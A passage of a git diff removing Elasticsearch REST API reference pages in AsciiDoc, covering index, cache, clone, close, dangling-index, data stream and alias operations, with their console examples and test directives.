list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, use `_all` or `*`. - - -[discrete] -[[indices-reload-analyzers-api-query-params]] -=== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - - -[discrete] -[[indices-reload-analyzers-api-example]] -=== {api-examples-title} - -Use the <> -to create an index with a search analyzer -that contains an updateable synonym filter. - -NOTE: Using the following analyzer as an index analyzer results in an error. - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_synonyms": { - "tokenizer": "whitespace", - "filter": [ "synonym" ] - } - }, - "filter": { - "synonym": { - "type": "synonym_graph", - "synonyms_path": "analysis/synonym.txt", <1> - "updateable": true <2> - } - } - } - } - }, - "mappings": { - "properties": { - "text": { - "type": "text", - "analyzer": "standard", - "search_analyzer": "my_synonyms" <3> - } - } - } -} --------------------------------------------------- - -<1> Includes a synonym file. -<2> Marks the token filter as updateable. -<3> Marks the analyzer as a search analyzer. - -After updating the synonym file, -use the <> -to reload the search analyzer -and pick up the file changes. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_reload_search_analyzers --------------------------------------------------- -// TEST[continued] - -The API returns the following response. - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "successful": 2, - "failed": 0 - }, - "reload_details": [ - { - "index": "my-index-000001", - "reloaded_analyzers": [ - "my_synonyms" - ], - "reloaded_node_ids": [ - "mfdqTXn_T7SGr2Ho2KT8uw" - ] - } - ] -} --------------------------------------------------- -// TEST[continued] -// TESTRESPONSE[s/"total": 2/"total": $body._shards.total/] -// TESTRESPONSE[s/"successful": 2/"successful": $body._shards.successful/] -// TESTRESPONSE[s/mfdqTXn_T7SGr2Ho2KT8uw/$body.reload_details.0.reloaded_node_ids.0/] diff --git a/docs/reference/indices/apis/unfreeze.asciidoc b/docs/reference/indices/apis/unfreeze.asciidoc deleted file mode 100644 index 111a335f378..00000000000 --- a/docs/reference/indices/apis/unfreeze.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[unfreeze-index-api]] -=== Unfreeze index API -++++ -Unfreeze index -++++ - -Unfreezes an index. - -[[unfreeze-index-api-request]] -==== {api-request-title} - -`POST //_unfreeze` - -//[[unfreeze-index-api-prereqs]] -//==== {api-prereq-title} - -[[unfreeze-index-api-desc]] -==== {api-description-title} - -When a frozen index is unfrozen, the index goes through the normal recovery -process and becomes writeable again. See <> and <>. - -IMPORTANT: Freezing an index will close the index and reopen it within the same -API call. This causes primaries to not be allocated for a short amount of time -and causes the cluster to go red until the primaries are allocated again. This -limitation might be removed in the future. - -[[unfreeze-index-api-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the index. - -[[unfreeze-index-api-examples]] -==== {api-examples-title} - -The following example freezes and unfreezes an index: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_freeze -POST /my-index-000001/_unfreeze --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] diff --git a/docs/reference/indices/clearcache.asciidoc b/docs/reference/indices/clearcache.asciidoc deleted file mode 100644 index 6a71f289655..00000000000 --- a/docs/reference/indices/clearcache.asciidoc +++ /dev/null @@ -1,152 +0,0 @@ -[[indices-clearcache]] -=== Clear cache API -++++ -Clear cache -++++ - -Clears the caches of one or more indices. For data streams, the API clears the -caches of the stream's backing indices. - -[source,console] ----- -POST /my-index-000001/_cache/clear ----- -// TEST[setup:my_index] - - -[[clear-cache-api-request]] -==== {api-request-title} - -`POST //_cache/clear` - -`POST /_cache/clear` - - -[[clear-cache-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[clear-cache-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`fielddata`:: -+ --- -(Optional, Boolean) -If `true`, -clears the fields cache. - -Use the `fields` parameter -to clear the cache of specific fields only. --- - -`fields`:: -+ --- -(Optional, string) -Comma-separated list of field names -used to limit the `fielddata` parameter. - -Defaults to all fields. - -NOTE: This parameter does *not* support objects -or field aliases. --- - - -`index`:: -(Optional, string) -Comma-separated list of index names -used to limit the request. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`query`:: -(Optional, Boolean) -If `true`, -clears the query cache. - -`request`:: -(Optional, Boolean) -If `true`, -clears the request cache. - - -[[clear-cache-api-example]] -==== {api-examples-title} - - -[[clear-cache-api-specific-ex]] -===== Clear a specific cache - -By default, -the clear cache API clears all caches. -You can clear only specific caches -by setting the following query parameters to `true`: - -* `fielddata` -* `query` -* `request` - -[source,console] ----- -POST /my-index-000001/_cache/clear?fielddata=true <1> -POST /my-index-000001/_cache/clear?query=true <2> -POST /my-index-000001/_cache/clear?request=true <3> ----- -// TEST[continued] - -<1> Clears only the fields cache -<2> Clears only the query cache -<3> Clears only the request cache - - - -[[clear-cache-api-specific-fields-ex]] -===== Clear the cache of specific fields - -To only clear the cache of specific fields, -use the `fields` query parameter. - -[source,console] ----- -POST /my-index-000001/_cache/clear?fields=foo,bar <1> ----- -// TEST[continued] - -<1> Clear the cache for the `foo` and `bar` field - - -[[clear-cache-api-multi-ex]] -===== Clear caches for several data streams and indices - -[source,console] ----- -POST /my-index-000001,my-index-000002/_cache/clear ----- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - - -[[clear-cache-api-all-ex]] -===== Clear caches for all data streams and indices - -[source,console] ----- -POST /_cache/clear ----- diff --git a/docs/reference/indices/clone-index.asciidoc b/docs/reference/indices/clone-index.asciidoc deleted file mode 100644 index 65921cc6908..00000000000 --- a/docs/reference/indices/clone-index.asciidoc +++ /dev/null @@ -1,178 +0,0 @@ -[[indices-clone-index]] -=== Clone index API -++++ -Clone index -++++ - -Clones an existing index. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_clone/cloned-my-index-000001 --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards" : 5,"blocks.write":true}}\n/] - - -[[clone-index-api-request]] -==== {api-request-title} - -`POST //_clone/` - -`PUT //_clone/` - - -[[clone-index-api-prereqs]] -==== {api-prereq-title} - -To clone an index, -the index must be marked as read-only -and have a <> status of `green`. - -For example, -the following request prevents write operations on `my_source_index` -so it can be cloned. -Metadata changes like deleting the index are still allowed. - -[source,console] --------------------------------------------------- -PUT /my_source_index/_settings -{ - "settings": { - "index.blocks.write": true - } -} --------------------------------------------------- -// TEST[s/^/PUT my_source_index\n/] - -The current write index on a data stream cannot be cloned. In order to clone -the current write index, the data stream must first be -<> so that a new write index is created -and then the previous write index can be cloned. - -[[clone-index-api-desc]] -==== {api-description-title} - -Use the clone index API -to clone an existing index into a new index, -where each original primary shard is cloned -into a new primary shard in the new index. - -[[cloning-works]] -===== How cloning works - -Cloning works as follows: - -* First, it creates a new target index with the same definition as the source - index. - -* Then it hard-links segments from the source index into the target index. (If - the file system doesn't support hard-linking, then all segments are copied - into the new index, which is a much more time consuming process.) - -* Finally, it recovers the target index as though it were a closed index which - had just been re-opened. - -[[clone-index]] -===== Clone an index - -To clone `my_source_index` into a new index called `my_target_index`, issue -the following request: - -[source,console] --------------------------------------------------- -POST /my_source_index/_clone/my_target_index --------------------------------------------------- -// TEST[continued] - -The above request returns immediately once the target index has been added to -the cluster state -- it doesn't wait for the clone operation to start. - -[IMPORTANT] -===================================== - -Indices can only be cloned if they meet the following requirements: - -* The target index must not exist. - -* The source index must have the same number of primary shards as the target index. - -* The node handling the clone process must have sufficient free disk space to - accommodate a second copy of the existing index. - -===================================== - -The `_clone` API is similar to the <> -and accepts `settings` and `aliases` parameters for the target index: - -[source,console] --------------------------------------------------- -POST /my_source_index/_clone/my_target_index -{ - "settings": { - "index.number_of_shards": 5 <1> - }, - "aliases": { - "my_search_indices": {} - } -} --------------------------------------------------- -// TEST[s/^/PUT my_source_index\n{"settings": {"index.blocks.write": true, "index.number_of_shards": "5"}}\n/] - -<1> The number of shards in the target index. This must be equal to the - number of shards in the source index. - - -NOTE: Mappings may not be specified in the `_clone` request. The mappings of -the source index will be used for the target index. - -[[monitor-cloning]] -===== Monitor the cloning process - -The cloning process can be monitored with the <>, or the <> can be used to wait -until all primary shards have been allocated by setting the `wait_for_status` -parameter to `yellow`. - -The `_clone` API returns as soon as the target index has been added to the -cluster state, before any shards have been allocated. At this point, all -shards are in the state `unassigned`. If, for any reason, the target index -can't be allocated, its primary shard will remain `unassigned` until it -can be allocated on that node. - -Once the primary shard is allocated, it moves to state `initializing`, and the -clone process begins. When the clone operation completes, the shard will -become `active`. At that point, {es} will try to allocate any -replicas and may decide to relocate the primary shard to another node. - -[[clone-wait-active-shards]] -===== Wait for active shards - -Because the clone operation creates a new index to clone the shards to, -the <> setting -on index creation applies to the clone index action as well. - - -[[clone-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the source index to clone. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index] - - -[[clone-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[clone-index-api-request-body]] -==== {api-request-body-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-aliases] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-settings] diff --git a/docs/reference/indices/close.asciidoc b/docs/reference/indices/close.asciidoc deleted file mode 100644 index f008857d366..00000000000 --- a/docs/reference/indices/close.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[indices-close]] -=== Close index API -++++ -Close index -++++ - -Closes an index. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_close --------------------------------------------------- -// TEST[setup:my_index] - - -[[close-index-api-request]] -==== {api-request-title} - -`POST //_close` - - -[[close-index-api-desc]] -==== {api-description-title} - -You use the close index API to close open indices. - -include::{es-repo-dir}/indices/open-close.asciidoc[tag=closed-index] - - -[[close-index-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] -+ -To close all indices, use `_all` or `*`. -To disallow the closing of indices with `_all` or wildcard expressions, -change the `action.destructive_requires_name` cluster setting to `true`. -You can update this setting in the `elasticsearch.yml` file -or using the <> API. - - -[[close-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[close-index-api-example]] -==== {api-examples-title} - -The following example shows how to close an index: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_close --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] - -The API returns following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true, - "shards_acknowledged": true, - "indices": { - "my-index-000001": { - "closed": true - } - } -} --------------------------------------------------- diff --git a/docs/reference/indices/create-data-stream.asciidoc b/docs/reference/indices/create-data-stream.asciidoc deleted file mode 100644 index 57322f4061c..00000000000 --- a/docs/reference/indices/create-data-stream.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[role="xpack"] -[[indices-create-data-stream]] -=== Create data stream API -++++ -Create data stream -++++ - -Creates a new <>. - -Data streams require a matching <>. -See <>. - -//// -[source,console] ----- -PUT /_index_template/template -{ - "index_patterns": ["my-data-stream*"], - "data_stream": { } -} ----- -//// - -[source,console] ----- -PUT /_data_stream/my-data-stream ----- -// TEST[continued] - -//// -[source,console] ------------------------------------ -DELETE /_data_stream/my-data-stream -DELETE /_index_template/template ------------------------------------ -// TEST[continued] -//// - -[[indices-create-data-stream-request]] -==== {api-request-title} - -`PUT /_data_stream/` - -[[indices-create-data-stream-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `create_index` -or `manage` <> for the data stream. - -[[indices-create-data-stream-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Required, string) Name of the data stream to create. - -Data stream names must meet the following criteria: - -- Lowercase only -- Cannot include `\`, `/`, `*`, `?`, `"`, `<`, `>`, `|`, ` ` (space character), -`,`, `#`, `:` -- Cannot start with `-`, `_`, `+`, `.` -- Cannot be `.` or `..` -- Cannot be longer than 255 bytes (note it is bytes, so multi-byte characters -will count towards the 255 limit faster) --- - diff --git a/docs/reference/indices/create-index.asciidoc b/docs/reference/indices/create-index.asciidoc deleted file mode 100644 index 90bd8f7ce69..00000000000 --- a/docs/reference/indices/create-index.asciidoc +++ /dev/null @@ -1,215 +0,0 @@ -[[indices-create-index]] -=== Create index API -++++ -Create index -++++ - -Creates a new index. - -[source,console] --------------------------------------------------- -PUT /my-index-000001 --------------------------------------------------- - - -[[indices-create-api-request]] -==== {api-request-title} - -`PUT /` - -[[indices-create-api-desc]] -==== {api-description-title} -You can use the create index API to add a new index to an {es} cluster. When -creating an index, you can specify the following: - -* Settings for the index -* Mappings for fields in the index -* Index aliases - - -[[indices-create-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Required, string) Name of the index you wish to create. - -// tag::index-name-reqs[] -Index names must meet the following criteria: - -- Lowercase only -- Cannot include `\`, `/`, `*`, `?`, `"`, `<`, `>`, `|`, ` ` (space character), `,`, `#` -- Indices prior to 7.0 could contain a colon (`:`), but that's been deprecated and won't be supported in 7.0+ -- Cannot start with `-`, `_`, `+` -- Cannot be `.` or `..` -- Cannot be longer than 255 bytes (note it is bytes, so multi-byte characters will count towards the 255 limit faster) -- Names starting with `.` are deprecated, except for <> and internal indices managed by plugins -// end::index-name-reqs[] --- - - -[[indices-create-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[indices-create-api-request-body]] -==== {api-request-body-title} - -`aliases`:: -(Optional, <>) Index aliases which include the -index. See <>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=settings] - -[[indices-create-api-example]] -==== {api-examples-title} - -[[create-index-settings]] -===== Index settings - -Each index created can have specific settings -associated with it, defined in the body: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "index": { - "number_of_shards": 3, <1> - "number_of_replicas": 2 <2> - } - } -} --------------------------------------------------- - -<1> Default for `number_of_shards` is 1 -<2> Default for `number_of_replicas` is 1 (ie one replica for each primary shard) - -or more simplified - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "number_of_shards": 3, - "number_of_replicas": 2 - } -} --------------------------------------------------- - -[NOTE] -You do not have to explicitly specify `index` section inside the -`settings` section. - -For more information regarding all the different index level settings -that can be set when creating an index, please check the -<> section. - -[[mappings]] -===== Mappings - -The create index API allows for providing a mapping definition: - -[source,console] --------------------------------------------------- -PUT /test -{ - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "properties": { - "field1": { "type": "text" } - } - } -} --------------------------------------------------- - -NOTE: Before 7.0.0, the 'mappings' definition used to include a type name. Although specifying -types in requests is now deprecated, a type can still be provided if the request parameter -include_type_name is set. For more details, please see <>. - -[[create-index-aliases]] -===== Aliases - -The create index API allows also to provide a set of <>: - -[source,console] --------------------------------------------------- -PUT /test -{ - "aliases": { - "alias_1": {}, - "alias_2": { - "filter": { - "term": { "user.id": "kimchy" } - }, - "routing": "shard-1" - } - } -} --------------------------------------------------- - -[[create-index-wait-for-active-shards]] -===== Wait for active shards - -By default, index creation will only return a response to the client when the primary copies of -each shard have been started, or the request times out. The index creation response will indicate -what happened: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true, - "shards_acknowledged": true, - "index": "test" -} --------------------------------------------------- - -`acknowledged` indicates whether the index was successfully created in the cluster, while -`shards_acknowledged` indicates whether the requisite number of shard copies were started for -each shard in the index before timing out. Note that it is still possible for either -`acknowledged` or `shards_acknowledged` to be `false`, but the index creation was successful. -These values simply indicate whether the operation completed before the timeout. If -`acknowledged` is `false`, then we timed out before the cluster state was updated with the -newly created index, but it probably will be created sometime soon. If `shards_acknowledged` -is `false`, then we timed out before the requisite number of shards were started (by default -just the primaries), even if the cluster state was successfully updated to reflect the newly -created index (i.e. `acknowledged=true`). - -We can change the default of only waiting for the primary shards to start through the index -setting `index.write.wait_for_active_shards` (note that changing this setting will also affect -the `wait_for_active_shards` value on all subsequent write operations): - -[source,console] --------------------------------------------------- -PUT /test -{ - "settings": { - "index.write.wait_for_active_shards": "2" - } -} --------------------------------------------------- -// TEST[skip:requires two nodes] - -or through the request parameter `wait_for_active_shards`: - -[source,console] --------------------------------------------------- -PUT /test?wait_for_active_shards=2 --------------------------------------------------- -// TEST[skip:requires two nodes] - -A detailed explanation of `wait_for_active_shards` and its possible values can be found -<>. diff --git a/docs/reference/indices/dangling-index-delete.asciidoc b/docs/reference/indices/dangling-index-delete.asciidoc deleted file mode 100644 index 59d4d62bfb4..00000000000 --- a/docs/reference/indices/dangling-index-delete.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[dangling-index-delete]] -=== Delete dangling index API -++++ -Delete dangling index -++++ - -Deletes a dangling index. - -[[dangling-index-delete-api-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -DELETE /_dangling/?accept_data_loss=true --------------------------------------------------- -// TEST[skip:Difficult to set up] - -[[dangling-index-delete-api-desc]] -==== {api-description-title} - -include::{es-repo-dir}/indices/dangling-indices-list.asciidoc[tag=dangling-index-description] - - -Deletes a dangling index by referencing its UUID. Use the -<> to locate the UUID of an index. - - -[[dangling-index-delete-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -UUID of the index to delete. You can find this using the -<>. - -[[dangling-index-delete-api-query-params]] -==== {api-query-parms-title} - -`accept_data_loss`:: -(Optional, Boolean) -This field must be set to `true` in order to carry out the import, since it will -no longer be possible to recover the data from the dangling index. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/dangling-index-import.asciidoc b/docs/reference/indices/dangling-index-import.asciidoc deleted file mode 100644 index 11ab92b4152..00000000000 --- a/docs/reference/indices/dangling-index-import.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -[[dangling-index-import]] -=== Import dangling index API -++++ -Import dangling index -++++ - -Imports a dangling index. - -[[dangling-index-import-api-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -POST /_dangling/?accept_data_loss=true --------------------------------------------------- -// TEST[skip:Difficult to set up] - -[[dangling-index-import-api-desc]] -==== {api-description-title} - -include::{es-repo-dir}/indices/dangling-indices-list.asciidoc[tag=dangling-index-description] - -Import a single index into the cluster by referencing its UUID. Use the -<> to locate the UUID of an index. - - -[[dangling-index-import-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -UUID of the index to import, which you can find using the -<>. - -[[dangling-index-import-api-query-params]] -==== {api-query-parms-title} - -`accept_data_loss`:: -(Required, Boolean) -This field must be set to `true` to import a dangling index. Because {es} -cannot know where the dangling index data came from or determine which shard -copies are fresh and which are stale, it cannot guarantee that the imported data -represents the latest state of the index when it was last in the cluster. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[dangling-index-import-api-example]] -==== {api-examples-title} - -The following example shows how to import a dangling index: - -[source,console] --------------------------------------------------- -POST /_dangling/zmM4e0JtBkeUjiHD-MihPQ?accept_data_loss=true --------------------------------------------------- -// TEST[skip:Difficult to set up] - -The API returns following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/indices/dangling-indices-list.asciidoc b/docs/reference/indices/dangling-indices-list.asciidoc deleted file mode 100644 index 863a4d8ac7f..00000000000 --- a/docs/reference/indices/dangling-indices-list.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[[dangling-indices-list]] -=== List dangling indices API -++++ -List dangling indices -++++ - -Lists dangling indices. - -[[dangling-indices-list-api-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -GET /_dangling --------------------------------------------------- -// TEST[skip:TBD] - -[[dangling-indices-list-api-desc]] -==== {api-description-title} - -// tag::dangling-index-description[] -If {es} encounters index data that is absent from the current cluster -state, those indices are considered to be dangling. For example, -this can happen if you delete more than -`cluster.indices.tombstones.size` indices while an {es} node is offline. -// end::dangling-index-description[] - -Use this API to list dangling indices, which you can then -<> or <>. - - -[[dangling-indices-list-api-example]] -==== {api-examples-title} - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "dangling_indices": [ - { - "index_name": "my-index-000001", - "index_uuid": "zmM4e0JtBkeUjiHD-MihPQ", - "creation_date_millis": 1589414451372, - "node_ids": [ - "pL47UN3dAb2d5RCWP6lQ3e" - ] - } - ] -} --------------------------------------------------- diff --git a/docs/reference/indices/data-stream-stats.asciidoc b/docs/reference/indices/data-stream-stats.asciidoc deleted file mode 100644 index 42e6b561707..00000000000 --- a/docs/reference/indices/data-stream-stats.asciidoc +++ /dev/null @@ -1,214 +0,0 @@ -[role="xpack"] -[[data-stream-stats-api]] -=== Data stream stats API -++++ -Data stream stats -++++ - -Retrieves statistics for one or more <>. - -//// -[source,console] ----- -PUT /_index_template/template -{ - "index_patterns": ["my-data-stream*"], - "data_stream": { } -} - -PUT /my-data-stream/_bulk?refresh -{"create":{ }} -{ "@timestamp": "2020-12-08T11:04:05.000Z" } -{"create":{ }} -{ "@timestamp": "2020-12-08T11:06:07.000Z" } -{"create":{ }} -{ "@timestamp": "2020-12-09T11:07:08.000Z" } - -POST /my-data-stream/_rollover/ -POST /my-data-stream/_rollover/ - -PUT /my-data-stream-two/_bulk?refresh -{"create":{ }} -{ "@timestamp": "2020-12-08T11:04:05.000Z" } -{"create":{ }} -{ "@timestamp": "2020-12-08T11:06:07.000Z" } - -POST /my-data-stream-two/_rollover/ ----- -// TESTSETUP -//// - -//// -[source,console] ----- -DELETE /_data_stream/* -DELETE /_index_template/* ----- -// TEARDOWN -//// - -[source,console] ----- -GET /_data_stream/my-data-stream/_stats ----- - -[[data-stream-stats-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`monitor` or `manage` <> -for the data stream. - -[[data-stream-stats-api-request]] -==== {api-request-title} - -`GET /_data_stream/` - - -[[data-stream-stats-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams used to limit the request. Wildcard -expressions (`*`) are supported. -+ -To target all data streams in a cluster, omit this parameter or use `*`. - -[[data-stream-stats-api-query-params]] -==== {api-query-parms-title} - -`human`:: -(Optional, Boolean) -If `true`, the response includes statistics in human-readable <>. Defaults to `false`. - - -[role="child_attributes"] -[[data-stream-stats-api-response-body]] -==== {api-response-body-title} - -`_shards`:: -(object) -Contains information about shards that attempted to execute the request. -+ -.Properties of `_shards` -[%collapsible%open] -==== -`total`:: -(integer) -Total number of shards that attempted to execute the request. - -`successful`:: -(integer) -Number of shards that successfully executed the request. - -`failed`:: -(integer) -Number of shards that failed to execute the request. -==== - -`data_stream_count`:: -(integer) -Total number of selected data streams. - -`backing_indices`:: -(integer) -Total number of backing indices for the selected data streams. - -`total_store_sizes`:: -(<>) -Total size of all shards for the selected data streams. -This property is included only if the `human` query parameter is `true`. - -`total_store_size_bytes`:: -(integer) -Total size, in bytes, of all shards for the selected data streams. - -`data_streams`:: -(array of objects) -Contains statistics for the selected data streams. -+ -.Properties of objects in `data_streams` -[%collapsible%open] -==== -`data_stream`:: -(string) -Name of the data stream. - -`backing_indices`:: -(integer) -Current number of backing indices for the data stream. - -`store_size`:: -(<>) -Total size of all shards for the data stream's backing indices. -This parameter is only returned if the `human` query parameter is `true`. - -`store_size_bytes`:: -(integer) -Total size, in bytes, of all shards for the data stream's backing indices. - -`maximum_timestamp`:: -(integer) -The data stream's highest `@timestamp` value, converted to milliseconds since -the {wikipedia}/Unix_time[Unix epoch]. -+ -[NOTE] -===== -This timestamp is provided as a best effort. The data stream may contain -`@timestamp` values higher than this if one or more of the following conditions -are met: - -* The stream contains <> backing indices. -* Backing indices with a <> contain -higher `@timestamp` values. -===== -==== - -[[data-stream-stats-api-example]] -==== {api-examples-title} - -[source,console] ----- -GET /_data_stream/my-data-stream*/_stats?human=true ----- - -The API returns the following response. - -[source,console-result] ----- -{ - "_shards": { - "total": 10, - "successful": 5, - "failed": 0 - }, - "data_stream_count": 2, - "backing_indices": 5, - "total_store_size": "7kb", - "total_store_size_bytes": 7268, - "data_streams": [ - { - "data_stream": "my-data-stream", - "backing_indices": 3, - "store_size": "3.7kb", - "store_size_bytes": 3772, - "maximum_timestamp": 1607512028000 - }, - { - "data_stream": "my-data-stream-two", - "backing_indices": 2, - "store_size": "3.4kb", - "store_size_bytes": 3496, - "maximum_timestamp": 1607425567000 - } - ] -} ----- -// TESTRESPONSE[s/"total_store_size": "7kb"/"total_store_size": $body.total_store_size/] -// TESTRESPONSE[s/"total_store_size_bytes": 7268/"total_store_size_bytes": $body.total_store_size_bytes/] -// TESTRESPONSE[s/"store_size": "3.7kb"/"store_size": $body.data_streams.0.store_size/] -// TESTRESPONSE[s/"store_size_bytes": 3772/"store_size_bytes": $body.data_streams.0.store_size_bytes/] -// TESTRESPONSE[s/"store_size": "3.4kb"/"store_size": $body.data_streams.1.store_size/] -// TESTRESPONSE[s/"store_size_bytes": 3496/"store_size_bytes": $body.data_streams.1.store_size_bytes/] \ No newline at end of file diff --git a/docs/reference/indices/delete-alias.asciidoc b/docs/reference/indices/delete-alias.asciidoc deleted file mode 100644 index 817bd95a103..00000000000 --- a/docs/reference/indices/delete-alias.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ -[[indices-delete-alias]] -=== Delete index alias API -++++ -Delete index alias -++++ - -Deletes an existing index alias. - -include::{es-repo-dir}/glossary.asciidoc[tag=index-alias-desc] - -[source,console] ----- -DELETE /my-index-000001/_alias/alias1 ----- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000001\/_alias\/alias1\n/] - -[[delete-alias-api-request]] -==== {api-request-title} - -`DELETE //_alias/` - -`DELETE //_aliases/` - - -[[delete-alias-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list or wildcard expression of index names -used to limit the request. -+ -To include all indices in the cluster, -use a value of `_all` or `*`. - -``:: -(Required, string) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias] -+ -To delete all aliases, -use a value of `_all` or `*`. - - -[[delete-alias-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/delete-component-template.asciidoc b/docs/reference/indices/delete-component-template.asciidoc deleted file mode 100644 index e559ddc3911..00000000000 --- a/docs/reference/indices/delete-component-template.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[[indices-delete-component-template]] -=== Delete component template API -++++ -Delete component template -++++ - -Deletes an existing component template. - -//// -[source,console] --------------------------------------------------- -PUT _component_template/template_1 -{ - "template": { - "settings": { - "index.number_of_replicas": 0 - } - } -} --------------------------------------------------- -// TESTSETUP -//// - -[source,console] --------------------------------------------------- -DELETE _component_template/template_1 --------------------------------------------------- - - -[[delete-component-template-api-request]] -==== {api-request-title} - -`DELETE /_component_template/` - - -[[delete-component-template-api-desc]] -==== {api-description-title} - -Use the delete component template API to delete one or more component templates -Component templates are building blocks for constructing <> -that specify index mappings, settings, and aliases. - -[[delete-component-template-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=component-template] - - -[[delete-component-template-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/delete-data-stream.asciidoc b/docs/reference/indices/delete-data-stream.asciidoc deleted file mode 100644 index d2e1f7401c0..00000000000 --- a/docs/reference/indices/delete-data-stream.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[role="xpack"] -[[indices-delete-data-stream]] -=== Delete data stream API -++++ -Delete data stream -++++ - -Deletes one or more <> and their backing -indices. See <>. - -//// -[source,console] ----- -PUT /_index_template/template -{ - "index_patterns": ["my-data-stream*"], - "data_stream": { } -} - -PUT /_data_stream/my-data-stream ----- -// TESTSETUP -//// - -[source,console] ----- -DELETE /_data_stream/my-data-stream ----- - -//// -[source,console] ----- -DELETE /_index_template/template ----- -// TEST[continued] -//// - -[[delete-data-stream-api-request]] -==== {api-request-title} - -`DELETE /_data_stream/` - -[[delete-data-stream-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `delete_index` -or `manage` <> for the data stream. - - -[[delete-data-stream-api-path-params]] -==== 